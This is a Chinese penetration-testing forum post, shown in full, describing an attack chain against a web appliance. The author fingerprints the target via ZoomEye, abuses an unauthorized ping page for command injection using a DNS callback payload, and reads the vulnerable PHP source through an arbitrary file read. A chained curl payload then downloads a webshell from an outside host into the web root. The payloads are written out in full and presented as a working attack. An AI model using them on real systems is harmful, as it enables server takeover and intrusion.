中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]

作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、$ A" }( B# {, ^0 k9 _( R9 R2 m
** **寻找突破口**: S9 d/ R! Z: I0 W, s
1 y  \" B; m6 N: H3 }4 A5 h
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**, _' T9 \, f2 F/ ^
" w8 E/ o5 ~( j( }$ ^2 q. E, C
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
3 r: h+ O4 k6 J( I$ ?4 P
8 m; p( K5 X1 t' D% y% D8 t- V7 E9 X

5 T. D- n( a3 i; D* g8 Y**发现reporter和[Technology,
( v6 Q  i8 m6 @/ q# Z1 P5 _( WInc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**
" q! l; I/ i9 m! h" W/ i& T% T5 E1 ~0 d
**地址为:**
! U( ?" @3 H/ O3 X$ q; _9 j- F; P. e. K) P9 L0 z
[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**+ m# ]* r3 p- Q' G
% ?$ [: m6 K- `$ O3 E
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")# _. z7 n. Z' |+ i( x

& Z9 c5 I; ?1 S1 B$ ~% A- ?' Y. Y9 {, W- y
# V0 p: o, J9 M' A$ w: V1 d& N2 `
**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**5 V3 w+ ?6 X4 W+ l7 G0 S- N

# n0 ?6 `2 g1 M- g**`whoami`.1111.ceye.io** **,如图:**
9 K  q& w* y. s% u5 i3 v3 U
( q' @: r" H( b6 G4 H![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")$ Y) H  Z! Z3 j2 p3 u# `/ f) G' U, h3 d1 z

/ o  S  A: G; `9 |
3 x; L: Q$ ]5 g0 I4 f3 x6 S0 o2 v
**返回dns记录如图:**7 `3 ^" [% ]: N# ~9 O

  i4 m/ m% d/ [7 p6 n5 s![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")8 r: C* p3 ]) ?: ^' S

- K; n8 g$ [3 A  Y) I
5 |. d  \( H1 ?9 G3 h( @. A3 R7 x6 G
$ P- r! ~" r$ l( x8 c/ ?5 d6 `**发现当前用户权限为root**9 o+ a1 n3 [! x7 ?( H
- z( B* _$ F. G" e/ _! c
**一、
  Y% u7 J4 m. F( |1 B9 X** **通过漏洞组合getwebshell**
3 e2 U$ V+ p, q: @# K
( f4 W  _! K5 _- s; A8 K**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**" i% W& N, u9 S! k: p, e  h7 i  u9 v

/ {  }6 X( q' j. ~+ k/ O![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
/ ?. \- y, M' u( e; A8 j. z  @2 [: p6 d; k$ Y; \( n. Y( ]

8 c% _& G1 \5 V# y1 E# Y3 r- N' _  r% ^3 n
**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**! V1 P* p7 z' i, C
9 `+ e' o5 v2 ?6 q/ f4 i% X
**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**; N. |( z( F: i
3 ^4 _& J" U/ v
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")3 a3 I/ v- n& b

0 [' w4 d" F4 r**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**
& H8 W+ \; Y  N, s& f' |; i. @3 ~+ [) N) T- Q4 C, A# }
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\6 D" b- `9 |& d4 r6 k$ |5 v
* S( _$ p0 n5 ^, _- k  d
8 ]+ b* ~- k; _# e; L
**源代码为:**
# G0 k) L4 v4 ?
, r6 ]$ L7 w( l* {9 _% G, W0 J% e<?php
/ i3 Q/ {2 n1 V, jinclude_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
: H5 F) P5 W/ I" I' g: R?>/ B& q0 A2 @: d

! q) \/ I0 ?0 Z9 l  k5 b- E  P<?php
: t* r/ P% d9 q) z: Y/ @% X2 b3 }7 l, `* V& }: K
) r/ \5 v( j- s$ B3 a& b0 N  R7 O

" n# b/ q, L( K( t( R+ E# Dsession_start ();
+ K. d* L0 C7 Q1 u% r
1 m: o0 f& Y4 ?3 m& t& d1 |3 f1 ?4 c# W9 p3 l

( z8 o' p) P* J3 J   b% H; B' W# M9 B+ E2 }% ?6 n2 ^
' D# |! Y0 D! K6 P7 v2 g+ P* o

. J) f4 s& ?8 Z0 X; W9 |! Q  a: o0 t# h3 t, V" {4 H
if ($_GET ["objClass"] == "")) \# Y) D" r! O* C

5 r* a+ w$ c, g( _9 Z+ _
0 P/ Q% ^4 m' g% e5 X! B' |) T+ o, ^. d/ F7 f0 ?
      exit ();6 D: ?- E. u% x7 [2 e- l

$ Z) @, @. g, M% U: o: L
% L8 L4 g% X- B9 G: c' o% j; J
2 S4 @6 U7 y  {+ ?3 T& _. E$param = $_REQUEST;
) L8 w# g+ e+ w4 b6 T% _7 V
- h4 y  ^4 i/ b" U7 Z% |7 ^; m# P1 ]' m0 h
: W8 ~* I7 T: S5 I) `8 J

$ j1 q5 t# L1 }* [0 L# k, r; x( U# s) N1 B/ Y
) n( R. J9 f( ]  B0 w2 n. Y

1 A5 J; Q' {1 q# W. z7 u//echo "\n--------------------------\n";
% q+ S' n4 T4 o0 {- Q
- R* }  i5 j, y; t7 K; y
8 e7 x7 ~. U8 w+ M! T$ k
$ h. q& i; h" p# X- |# Y//print_r($param);* }5 Y" n; a  x) F7 Q

/ E5 o; a0 `4 y. \1 r% n$ N8 f2 m6 i# C

# n- D- W8 D4 O! |" v% f/ s+ W& G//echo "\n--------------------------\n";
" S2 [: H% {- f+ I8 Q) A: P* Y9 W/ }6 _; l9 [: T
& h8 M8 \6 D) E8 _3 }! M$ o2 T  F

: i: n& H2 q+ s! O& u[if ($_GET ["method"] ==
8 J8 J, x% t- _% g- l3 X7 j"getList" || $_GET ["method"] == "import" ||$ p, X& F5 O7 K+ H% Q2 v" Q- a
$_GET ["method"] == "processAlarm") ](){
, x" F2 T7 Q% M% N
- {5 ]5 h' P- E( U3 K& z# K, A
! O7 q, C0 E. ?2 u. P& [7 T+ h6 i1 O6 p! W1 K  A
      $param
* N! c) I) r; `  S) I9 k["user"] = $_SESSION ["s_userName"];
$ f2 M3 S  ?, g7 X6 J1 ^4 D( k. d) {, s0 O- P- K
/ A, m% c' w8 f4 N3 _: ~& ^5 s6 f
# l" U; ]: C' t: k9 S" h# |
      $param
/ \8 d% |+ ^6 A2 r; W/ t["lan"] = $_SESSION ["lan"];
: l1 B5 G% N% y* I7 g
7 ~% J* h0 i/ R" V/ [; y
. _2 _1 _. r# r2 a' a
" G" z, {) C5 r0 }: [      $param" Y; X8 k( e& V2 _! p- K. F* g
["regUserpath"] = $_SESSION ["regUserpath"];9 R  u- e- W# p% A. \

' c$ E0 X. T2 D* T! M# i+ ^! e! N# v. }0 O! ?9 Y! m+ E6 c

3 w- v* l. R1 T4 s. V" R& `    6 T, B+ C" s* E( z6 i

% z5 M6 l" W9 R4 b& `& H8 j% K5 e$ o, @6 B+ o; t% \" Z8 z/ E' E  d
3 v) k5 p- L! A$ [1 e& i
      exec (9 z! g2 R) \$ \' y- H
"rm -rf /tmp/cache" );# C5 W6 x4 X; D! u2 W

1 d7 D. L2 W6 f9 y7 I- {
. s  I- R: S# t+ m- m; j/ ^
, h$ X2 w# f2 Q) E      [$cmd = "/usr/local/php/bin/php ".$_SERVER1 }, t/ s# Z3 J6 q
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
/ U: d. L( m8 u* t; r" z
# H# V& l4 A, M: \: k, T1 A: }9 y( q) H. j; [2 g- r* b* W+ g
7 c8 X, G/ ^1 [6 O
      $cmd .=
  g. P( ]# x' l- }* o" " . $_GET ["objClass"];
7 ]4 O; P. s- d5 S, a
! }! U) E; R7 J% S
- a7 h! H: w' g  Y) U2 }' S, g$ ?- o6 k+ _
      $cmd .=/ {' U2 m1 \% J7 w* k$ U. L
" " . $_GET ["method"];, t2 X/ L; t. o) ]) H& h
2 F+ W: Q, q/ w/ g; B* s0 P

+ f) x3 z1 M: M5 C
6 |$ y" H' y2 w6 D      $cmd .=2 g% S! \( j9 f$ q
" " . base64_encode ( json_encode ( $param ) );
5 F$ `( ]. f$ b& R3 _0 a: p% U0 g
5 E# |4 r; f4 A5 e( h
/ a% `/ o+ q: l
      [file_put_contents("/tmp/query_cmd",$cmd);]()3 s4 v  a" Y. e
4 Z) b& }0 F4 |7 H  D6 p
* S1 L1 {1 L4 L7 b" b
$ R5 i) \+ K$ I% U' r3 S" h
      exec ( $cmd . " & m0 k( o' A1 N* y' n: A  W% n& x$ p' k
> /dev/null &" );* }+ {1 o6 w# p$ b! l

5 w3 [6 E" P" E' W% k
0 V& C) u3 l3 C7 l& ~6 l' o$ v
# E+ @, |7 \* A& t: ^& H
6 w+ r- r8 c* P8 j% L: z$ o  F, `3 Y6 B8 M5 g0 E( Z/ x
} else {
" [8 D4 Y6 |+ r' v: R: `; m5 P1 A0 V/ D7 \. I% Z9 K- l

8 x8 E. ?; x7 z3 N4 m. C$ Z
8 _* e  z5 y2 I! C0 ^      require_once  }. j5 _' W- a8 }; Q
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");$ B; ^, X5 }0 [- O$ K: I
+ ^5 h8 O2 j9 _$ H# ?+ ^+ W5 T" R0 `

4 v$ a  j  Z& o  i4 X: R  r
0 Q& _1 y( r' H3 g  i" o      $obj = new" v  A8 W! @( A0 N, z- e
QueryInterface ();5 O% l6 X% X2 ~8 T5 Q
2 n2 i7 o* P- h6 h& @

% z7 a0 P5 b5 ~# m( }7 z" \7 J2 H2 ~- W
      $instance =1 o  o( m3 K% o. C5 W' H1 L! v
$obj->getInstance ();
; n! r7 Z4 f  r. T* R3 Y2 X  s" x' l: G
0 E, `. @  J" T: y
1 S; j& D# }4 o  k
      $instance->invokeMethod+ B/ F/ o% x3 @5 m* P& e. f
( $_GET ["objClass"], $_GET ["method"], $param );" j* \' {* z1 H& V
4 W& K& F  c2 a8 v8 D

7 T" j9 u# j7 G4 T0 I) D% W9 w! k% g: W9 z) m! B1 Y
}
0 e! n1 C" S2 V3 Q+ w- a* U" m" t1 j/ h0 w5 i

  F2 k  v- m  O8 Y3 r/ C& j- b6 X% a4 K
exit ();
; U5 u* `7 B. N5 d: m! E8 [1 v( n; O% N, O* W& W# n

( M1 J' `- W, j  R& W" B; [8 n4 ~) h4 H# T. S3 a$ i- \: j
?>: x% k9 s7 r3 ~" ?1 B
- }$ t1 u- V* I- i6 S- v
**经常简单审计发现if ($_GET
1 Z7 n  g: V# Y( I' n, v2 h/ @9 g["method"] == "getList" || $_GET ["method"] ==
- X/ m) l2 }5 J/ k; O! y6 E"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =! i- O! @$ o5 E9 q! z. q. D) G% y
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .0 J2 ~! j6 O* d
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**) r' b4 F% a% m$ Z& n
0 y- X; D$ l% \# Y5 o- d4 Z) \
**      exec ( $cmd
5 s; U( h& d' c$ k! Z8 W. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**
' L3 }  }* o. n1 `
: G1 ^3 t/ g# R+ X3 ~
! F# u8 G9 Z" b& o8 W+ k![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
' J' O9 @5 b$ e) H* A6 w% X& P8 H, Q( i$ }

2 \3 H6 g. V# ^' x$ T0 }- w1 r
, q5 a1 R8 z: E4 v: u4 V**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**6 i" s+ e) l8 E2 H7 {) _
( _8 z7 ~4 u" n9 t% ~
**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**
7 W" T1 Y7 I9 F6 i$ q
$ f9 d9 P/ i/ |3 P* S# J8 u**我们用url解码如下:**! `5 H3 P0 f4 D. @0 {
- z) Z& V  G8 t, b3 O& s, H
**|curl http://1.1.1.1/qYCwxRz1.zip -o
; a$ p9 w+ X7 U2 y) _9 H) L* U/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o8 z% C) c7 L& A
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)
9 ]: g5 i4 v6 w6 P5 Y# T) z' n6 [; P6 B1 M
**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
7 g8 M& S# F6 ?% G! U$ j6 G; F! v% s( ~8 e0 `' x, D7 h

9 Z! Z! n- ~! S![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
: |. Y) Z+ \  U( x# _: Y% Y. W8 o0 @" Z0 j$ {: T6 ]

# O1 k# X* X3 V: H
$ _& @/ E+ o' i" u" {" l& Z$ u2 [* M8 x
**三、总结**
$ e; Q; A) m; g  i& E4 ]+ L8 r& [5 P' q
**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**; W. W! k3 u) d0 r& f& W

8 c! n. o! z& l! L$ S**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **! x- k$ k! A) D. V$ V
[/md]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2